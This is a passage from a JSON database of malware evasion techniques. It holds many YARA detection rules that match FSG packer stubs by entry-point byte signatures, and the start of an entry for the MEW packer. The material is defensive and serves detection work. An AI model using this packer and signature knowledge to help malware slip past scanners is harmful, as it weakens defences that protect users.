8C 7F EB 02 CD 20 5E 80 C9 16 03 F7 EB 02 40 B0 68 F4 00 00 00 80 F1 2C 5B C1 E9 05 0F B6 C9 8A 16 0F B6 C9 0F BF C7 2A D3 E8 02 00 00 00 99 4C 58 80 EA 53 C1 C9 16 2A D3 E8 02 00 00 00 9D CE }\r\n        $b = { 33 C2 2C FB 8D 3D 7E 45 B4 80 E8 02 00 00 00 8A 45 58 68 02 ?? 8C 7F EB 02 CD 20 5E 80 C9 16 03 F7 EB 02 40 B0 68 F4 00 00 00 80 F1 2C 5B C1 E9 05 0F B6 C9 8A 16 0F B6 C9 0F BF C7 2A D3 E8 02 00 00 00 99 4C 58 80 EA 53 C1 C9 16 2A D3 E8 02 00 00 00 9D CE 58 80 EA 33 C1 E1 12 32 D3 48 80 C2 26 EB 02 CD 20 88 16 F7 D8 46 EB 01 C0 4B 40 8D 0D 00 00 00 00 3B D9 75 B7 EB 01 14 EB 01 0A CF C5 93 53 90 DA 96 67 54 8D CC ?? ?? 51 8E 18 74 53 82 83 80 47 B4 D2 41 FB 64 31 6A AF 7D 89 BC 0A 91 D7 83 37 39 43 50 A2 32 DC 81 32 3A 4B 97 3D D9 63 1F 55 42 F0 45 32 60 9A 28 51 61 4B 38 4B 12 E4 49 C4 99 09 47 F9 42 8C 48 51 4E 70 CF B8 12 2B 78 09 06 07 17 55 D6 EA 10 8D 3F 28 E5 02 0E A2 58 B8 D6 0F A8 E5 10 EB E8 F1 23 EF 61 E5 E2 54 EA A9 2A 22 AF 17 A1 23 97 9A 1C }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v120_Eng_dulekxt_Borland_Delphi_Microsoft_Visual_Cpp: PEiD\r\n{\r\n    strings:\r\n        $a = { 0F B6 D0 E8 01 00 00 00 0C 5A B8 80 ?? ?? 00 EB 02 00 DE 8D 35 F4 00 00 00 F7 D2 EB 02 0E EA 8B 38 EB 01 A0 C1 F3 11 81 EF 84 88 F4 4C EB 02 CD 20 83 F7 22 87 D3 33 FE C1 C3 19 83 F7 26 E8 02 00 00 00 BC DE 5A 81 EF F7 EF 6F 18 EB 02 CD 20 83 EF 7F EB 01 }\r\n        $b = { 0F B6 D0 E8 01 00 00 00 0C 5A B8 80 ?? ?? 00 EB 02 00 DE 8D 35 F4 00 00 00 F7 D2 EB 02 0E EA 8B 38 EB 01 A0 C1 F3 11 81 EF 84 88 F4 4C EB 02 CD 20 83 F7 22 87 D3 33 FE C1 C3 19 83 F7 26 E8 02 00 00 00 BC DE 5A 81 EF F7 EF 6F 18 EB 02 CD 20 83 EF 7F EB 01 F7 2B FE EB 01 7F 81 EF DF 30 90 1E EB 02 CD 20 87 FA 88 10 80 EA 03 40 EB 01 20 4E EB 01 3D 83 FE 00 75 A2 EB 02 CD 20 EB 01 C3 78 73 42 F7 35 6C 2D 3F ED 33 97 ?? ?? ?? 5D F0 45 29 55 57 55 71 63 02 72 E9 1F 2D 67 B1 C0 91 FD 10 58 A3 90 71 6C 83 11 E0 5D 20 AE 5C 71 83 D0 7B 10 97 54 17 11 C0 0E 00 33 76 85 33 3C 33 21 31 F5 50 CE 56 6C 89 C8 F7 CD 70 D5 E3 DD 08 E8 4E 25 FF 0D F3 ED EF C8 0B 89 A6 CD 77 42 F0 A6 C8 19 66 3D B2 CD E7 89 CB 13 D7 D5 E3 1E DF 5A E3 D5 50 DF B3 39 32 C0 2D B0 3F B4 B4 43 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_60_ASM_: PEiD\r\n{\r\n    strings:\r\n        $a = { F7 D0 EB 02 CD 20 BE BB 74 1C FB EB 02 CD 20 BF 3B ?? ?? FB C1 C1 03 33 F7 EB 02 CD 20 68 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v120_Eng_dulekxt_Borland_Delphi_Borland_Cpp_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 0F BE C1 EB 01 0E 8D 35 C3 BE B6 22 F7 D1 68 43 ?? ?? 22 EB 02 B5 15 5F C1 F1 15 33 F7 80 E9 F9 BB F4 00 00 00 EB 02 8F D0 EB 02 08 AD 8A 16 2B C7 1B C7 80 C2 7A 41 80 EA 10 EB 01 3C 81 EA CF AE F1 AA EB 01 EC 81 EA BB C6 AB EE 2C E3 32 D3 0B CB 81 EA AB EE 90 14 2C 77 2A D3 EB 01 87 2A D3 E8 01 00 00 00 92 59 88 16 EB 02 52 08 46 EB 02 CD 20 4B 80 F1 C2 85 DB 75 AE C1 E0 04 EB 00 DA B2 82 5C 9B C7 89 98 4F 8A F7 ?? ?? ?? B1 4D DF B8 AD AC AB D4 07 27 D4 50 CF 9A D5 1C EC F2 27 77 18 40 4E A4 A8 B4 CB 9F 1D D9 EC 1F AD BC 82 AA C0 4C 0A A2 15 45 18 8F BB 07 93 BE C0 BC A3 B0 9D 51 D4 F1 08 22 62 96 6D 09 73 7E 71 A5 3A E5 7D 94 A3 96 99 98 72 B2 31 57 7B FA AE 9D 28 4F 99 EF A3 25 49 60 03 42 8B 54 53 5E 92 50 D4 52 4D C1 55 76 FD F7 8A FC 78 0C 82 87 0F }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v131_Eng_dulekxt: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 BB ?? ?? ?? 00 B2 80 A4 B6 80 FF D3 73 F9 33 C9 FF D3 73 16 33 C0 FF D3 73 23 B6 80 41 B0 10 FF D3 12 C0 73 FA 75 42 AA EB E0 E8 46 00 00 00 02 F6 83 D9 01 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 48 13 C9 EB }\r\n        $b = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 BB ?? ?? ?? 00 B2 80 A4 B6 80 FF D3 73 F9 33 C9 FF D3 73 16 33 C0 FF D3 73 23 B6 80 41 B0 10 FF D3 12 C0 73 FA 75 42 AA EB E0 E8 46 00 00 00 02 F6 83 D9 01 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 48 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B6 00 56 8B F7 2B F0 F3 A4 5E EB 97 33 C9 41 FF D3 13 C9 FF D3 72 F8 C3 02 D2 75 05 8A 16 46 12 D2 C3 5B 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 58 FF FF FF 5F BB ?? ?? ?? 00 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 0F 74 EF FE 0F 75 06 47 FF 37 AF EB 09 FE 0F 0F 84 ?? ?? ?? FF 57 55 FF 53 04 89 06 AD 85 C0 75 D9 8B EC C3 ?? ?? ?? 00 00 00 00 00 00 00 00 00 88 01 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_C_Basic_NET_: PEiD\r\n{\r\n    strings:\r\n        $a = { EB ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EB ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 77 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_bartxt_Watcom_CCpp_EXE_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 CD 20 03 ?? 8D ?? 80 ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? EB 02 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Delphi_20: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 56 E8 02 00 00 00 B2 D9 59 68 80 ?? 41 00 E8 02 00 00 00 65 32 59 5E EB 02 CD 20 BB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_C_Basic_NET: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EB }\r\n        $b = { EB ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EB ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 77 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B3 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_131_Eng_dulekxt_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { C1 E0 06 EB 02 CD 20 EB 01 27 EB 01 24 BE 80 ?? 42 00 49 EB 01 99 8D 1D F4 00 00 00 EB 01 5C F7 D8 1B CA EB 01 31 8A 16 80 E9 41 EB 01 C2 C1 E0 0A EB 01 A1 81 EA A8 8C 18 A1 34 46 E8 01 00 00 00 62 59 32 D3 C1 C9 02 EB 01 68 80 F2 1A 0F BE C9 F7 D1 2A D3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v10_dulekxt: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_02_FSG_131: PEiD\r\n{\r\n    strings:\r\n        $a = { BE 90 90 90 00 BF 90 90 90 00 BB 90 90 90 00 53 BB 90 90 90 00 B2 80 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_bartxt_WinRAR_SFX_: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 E9 A1 C1 C1 13 68 E4 16 75 46 C1 C1 05 5E EB 01 9D 68 64 86 37 46 EB 02 8C E0 5F F7 D0 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v133_Eng_dulekxt_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BE A4 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33 C0 FF 13 73 1F B6 80 41 B0 10 FF 13 12 C0 73 FA 75 3C AA EB E0 FF 53 08 02 F6 83 D9 01 75 0E FF 53 04 EB 26 AC D1 E8 74 2F 13 C9 EB 1A 91 48 C1 E0 08 AC FF 53 04 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B6 00 56 8B F7 2B F0 F3 A4 5E EB 9D 8B D6 5E AD 48 74 0A 79 02 AD 50 56 8B F2 97 EB 87 AD 93 5E 46 AD 97 56 FF 13 95 AC 84 C0 75 FB FE 0E 74 F0 79 05 46 AD 50 EB 09 FE 0E 0F 84 ?? ?? ?? FF 56 55 FF 53 04 AB EB E0 33 C9 41 FF 13 13 C9 FF 13 72 F8 C3 02 D2 75 05 8A 16 46 12 D2 C3 ?? ?? ?? 00 00 00 00 00 00 00 00 00 54 01 00 00 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 01 00 00 6F 01 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v133_dulekxt: PEiD\r\n{\r\n    strings:\r\n        $a = { BE A4 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Cpp: PEiD\r\n{\r\n    strings:\r\n        $a = { 23 CA EB 02 5A 0D E8 02 00 00 00 6A 35 58 C1 C9 10 BE 80 ?? ?? 00 0F B6 C9 EB 02 CD 20 BB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 ?? BF ?? 10 40 ?? BE }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v100_Eng_dulekxt_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_110_Eng_dulekxt_Borland_Delphi_Microsoft_Visual_Cpp_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 2B C2 E8 02 00 00 00 95 4A 59 8D 3D 52 F1 2A E8 C1 C8 1C BE 2E ?? ?? 18 EB 02 AB A0 03 F7 EB 02 CD 20 68 F4 00 00 00 0B C7 5B 03 CB 8A 06 8A 16 E8 02 00 00 00 8D 46 59 EB 01 A4 02 D3 EB 02 CD 20 02 D3 E8 02 00 00 00 57 AB 58 81 C2 AA 87 AC B9 0F BE C9 80 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_110_Eng_dulekxt_Borland_Delphi_Borland_Cpp: PEiD\r\n{\r\n    strings:\r\n        $a = { 23 CA EB 02 5A 0D E8 02 00 00 00 6A 35 58 C1 C9 10 BE 80 ?? ?? 00 0F B6 C9 EB 02 CD 20 BB F4 00 00 00 EB 02 04 FA EB 01 FA EB 01 5F EB 02 CD 20 8A 16 EB 02 11 31 80 E9 31 EB 02 30 11 C1 E9 11 80 EA 04 EB 02 F0 EA 33 CB 81 EA AB AB 19 08 04 D5 03 C2 80 EA }\r\n        $b = { 2B C2 E8 02 00 00 00 95 4A 59 8D 3D 52 F1 2A E8 C1 C8 1C BE 2E ?? ?? 18 EB 02 AB A0 03 F7 EB 02 CD 20 68 F4 00 00 00 0B C7 5B 03 CB 8A 06 8A 16 E8 02 00 00 00 8D 46 59 EB 01 A4 02 D3 EB 02 CD 20 02 D3 E8 02 00 00 00 57 AB 58 81 C2 AA 87 AC B9 0F BE C9 80 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_70_: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v133_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BE A4 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33 C0 FF 13 73 1F B6 80 41 B0 10 FF 13 12 C0 73 FA 75 3C AA EB E0 FF 53 08 02 F6 83 D9 01 75 0E FF 53 04 EB 26 AC D1 E8 74 2F 13 C9 EB 1A 91 48 C1 E0 08 AC FF 53 04 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B6 00 56 8B F7 2B F0 F3 A4 5E EB 9D 8B D6 5E AD 48 74 0A 79 02 AD 50 56 8B F2 97 EB 87 AD 93 5E 46 AD 97 56 FF 13 95 AC 84 C0 75 FB FE 0E 74 F0 79 05 46 AD 50 EB 09 FE 0E 0F 84 ?? ?? ?? FF 56 55 FF 53 04 AB EB E0 33 C9 41 FF 13 13 C9 FF 13 72 F8 C3 02 D2 75 05 8A 16 46 12 D2 C3 ?? ?? ?? 00 00 00 00 00 00 00 00 00 54 01 00 00 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 01 00 00 6F 01 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_4x_LCC_Win32_1x_: PEiD\r\n{\r\n    strings:\r\n        $a = { 2C 71 1B CA EB 01 2A EB 01 65 8D 35 80 ?? ?? 00 80 C9 84 80 C9 68 BB F4 00 00 00 EB 01 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Delphi_Microsoft_Visual_Cpp_: PEiD\r\n{\r\n    strings:\r\n        $a = { C1 C8 10 EB 01 0F BF 03 74 66 77 C1 E9 1D 68 83 ?? ?? 77 EB 02 CD 20 5E EB 02 CD 20 2B F7 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Delphi_Microsoft_Visual_Cpp_ASM: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 CD 20 EB 02 CD 20 EB 02 CD 20 C1 E6 18 BB 80 ?? ?? 00 EB 02 82 B8 EB 01 10 8D 05 F4 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Delphi_Borland_Cue: PEiD\r\n{\r\n    strings:\r\n        $a = { 2B C2 E8 02 00 00 00 95 4A 59 8D 3D 52 F1 2A E8 C1 C8 1C BE 2E ?? ?? 18 EB 02 AB A0 03 F7 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_60_70_ASM_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 01 00 00 00 0E 59 E8 01 00 00 00 58 58 BE 80 ?? ?? 00 EB 02 61 E9 68 F4 00 00 00 C1 C8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_120_Eng_dulekxt_Microsoft_Visual_Cpp_60: PEiD\r\n{\r\n    strings:\r\n        $a = { C1 E0 06 EB 02 CD 20 EB 01 27 EB 01 24 BE 80 ?? 42 00 49 EB 01 99 8D 1D F4 00 00 00 EB 01 5C F7 D8 1B CA EB 01 31 8A 16 80 E9 41 EB 01 C2 C1 E0 0A EB 01 A1 81 EA A8 8C 18 A1 34 46 E8 01 00 00 00 62 59 32 D3 C1 C9 02 EB 01 68 80 F2 1A 0F BE C9 F7 D1 2A D3 }\r\n        $b = { EB 02 CD 20 EB 01 91 8D 35 80 ?? ?? 00 33 C2 68 83 93 7E 7D 0C A4 5B 23 C3 68 77 93 7E 7D EB 01 FA 5F E8 02 00 00 00 F7 FB 58 33 DF EB 01 3F E8 02 00 00 00 11 88 58 0F B6 16 EB 02 CD 20 EB 02 86 2F 2A D3 EB 02 CD 20 80 EA 2F EB 01 52 32 D3 80 E9 CD 80 EA }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_MASM32_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 DB E8 02 00 00 00 86 43 5E 8D 1D D0 75 CF 83 C1 EE 1D 68 50 ?? 8F 83 EB 02 3D 0F 5A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_MASM32: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 DB E8 02 00 00 00 86 43 5E 8D 1D D0 75 CF 83 C1 EE 1D 68 50 ?? 8F 83 EB 02 3D 0F 5A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_FSG_131_Anorganix_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BE 90 90 90 00 BF 90 90 90 00 BB 90 90 90 00 53 BB 90 90 90 00 B2 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_dulekxt_Borland_Delphi_Borland_Cpp: PEiD\r\n{\r\n    strings:\r\n        $a = { 2B C2 E8 02 00 00 00 95 4A 59 8D 3D 52 F1 2A E8 C1 C8 1C BE 2E ?? ?? 18 EB 02 AB A0 03 F7 EB 02 CD 20 68 F4 00 00 00 0B C7 5B 03 CB 8A 06 8A 16 E8 02 00 00 00 8D 46 59 EB 01 A4 02 D3 EB 02 CD 20 02 D3 E8 02 00 00 00 57 AB 58 81 C2 AA 87 AC B9 0F BE C9 80 EA 0F E8 01 00 00 00 64 59 02 D3 EB 02 D6 5C 88 16 EB 02 CD 20 46 E8 02 00 00 00 6B B5 59 4B 0F B7 C6 0B DB 75 B1 EB 02 50 AA 91 44 5C 90 D2 95 57 9B AE E1 A4 65 ?? ?? ?? B3 09 A1 C6 BF C2 C5 CA 9D 43 D6 5E ED 20 EF B2 A6 98 69 1F CA 96 A8 FA FA 12 25 77 F3 DD 60 F2 73 A8 C3 45 2E 22 43 C4 FA 15 2E 73 97 BE D5 04 25 A6 D5 E0 FC 54 EC D9 A0 84 C4 04 FA D6 D7 07 3A 14 4F 18 F6 AB D8 88 B8 E7 CB C4 36 B8 51 4E 4B 97 29 7C B4 3F D7 99 BC 66 DA CE 9C AC DD 01 0D 65 6D CD F5 5E F6 8E 7F 36 4F A7 AF 27 C7 70 5? }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v120_Eng_dulekxt_Borland_Cpp: PEiD\r\n{\r\n    strings:\r\n        $a = { C1 F0 07 EB 02 CD 20 BE 80 ?? ?? 00 1B C6 8D 1D F4 00 00 00 0F B6 06 EB 02 CD 20 8A 16 0F B6 C3 E8 01 00 00 00 DC 59 80 EA 37 EB 02 CD 20 2A D3 EB 02 CD 20 80 EA 73 1B CF 32 D3 C1 C8 0E 80 EA 23 0F B6 C9 02 D3 EB 01 B5 02 D3 EB 02 DB 5B 81 C2 F6 56 7B F6 }\r\n        $b = { C1 F0 07 EB 02 CD 20 BE 80 ?? ?? 00 1B C6 8D 1D F4 00 00 00 0F B6 06 EB 02 CD 20 8A 16 0F B6 C3 E8 01 00 00 00 DC 59 80 EA 37 EB 02 CD 20 2A D3 EB 02 CD 20 80 EA 73 1B CF 32 D3 C1 C8 0E 80 EA 23 0F B6 C9 02 D3 EB 01 B5 02 D3 EB 02 DB 5B 81 C2 F6 56 7B F6 EB 02 56 7B 2A D3 E8 01 00 00 00 ED 58 88 16 13 C3 46 EB 02 CD 20 4B EB 02 CD 20 2B C9 3B D9 75 A1 E8 02 00 00 00 D7 6B 58 EB 00 9E 96 6A 28 67 AB 69 54 03 3E 7F ?? ?? ?? 31 0D 63 44 35 38 37 18 87 9F 10 8C 37 C6 41 80 4C 5E 8B DB 60 4C 3A 28 08 30 BF 93 05 D1 58 13 2D B8 86 AE C8 58 16 A6 95 C5 94 03 33 6F FF 92 20 98 87 9C E5 B9 20 B5 68 DE 16 4A 15 C1 7F 72 71 65 3E A9 85 20 AF 5A 59 54 26 66 E9 3F 27 DE 8E 7D 34 53 61 F7 AF 09 29 5C F7 36 83 60 5F 52 92 5C D0 56 55 C9 61 7A FD EF 7E E8 70 F8 6E 7B EF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_110_Eng_dulekxt_Microsoft_Visual_Cpp_60_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 03 F7 23 FE 33 FB EB 02 CD 20 BB 80 ?? 40 00 EB 01 86 EB 01 90 B8 F4 00 00 00 83 EE 05 2B F2 81 F6 EE 00 00 00 EB 02 CD 20 8A 0B E8 02 00 00 00 A9 54 5E C1 EE 07 F7 D7 EB 01 DE 81 E9 B7 96 A0 C4 EB 01 6B EB 02 CD 20 80 E9 4B C1 CF 08 EB 01 71 80 E9 1C EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_60: PEiD\r\n{\r\n    strings:\r\n        $a = { 03 DE EB 01 F8 B8 80 ?? 42 00 EB 02 CD 20 68 17 A0 B3 AB EB 01 E8 59 0F B6 DB 68 0B A1 B3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_60_70_: PEiD\r\n{\r\n    strings:\r\n        $a = { 0B D0 8B DA E8 02 00 00 00 40 A0 5A EB 01 9D B8 80 ?? ?? ?? EB 02 CD 20 03 D3 8D 35 F4 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_110_Eng_dulekxt_Borland_Cpp_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
                }
            ]
        },
        {
            "id": 188,
            "unprotect_id": "U1407",
            "name": "MEW",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "MEW is an EXE compression tool that was specifically designed to handle small files.",
            "resources": "https://www.softpedia.com/get/Programming/Packers-Crypters-Protectors/MEW-SE.shtml",
            "tags": "",
            "snippets": [],
            "detection_rules": [
                {
                    "id": 106,
                    "key": "yara_detect_mew",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_Detect_Mew",
                    "rule": "rule Mew_11_SE_v12_Eng_Northfox_: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? FF 0C ?? ?? 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 0C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Mew_10_V10_Eng_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C0 E9 ?? ?? FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_v10_Northfox_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? FF 0C ?? 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 0C ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_12: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? FF 0C ?? 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 0C ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 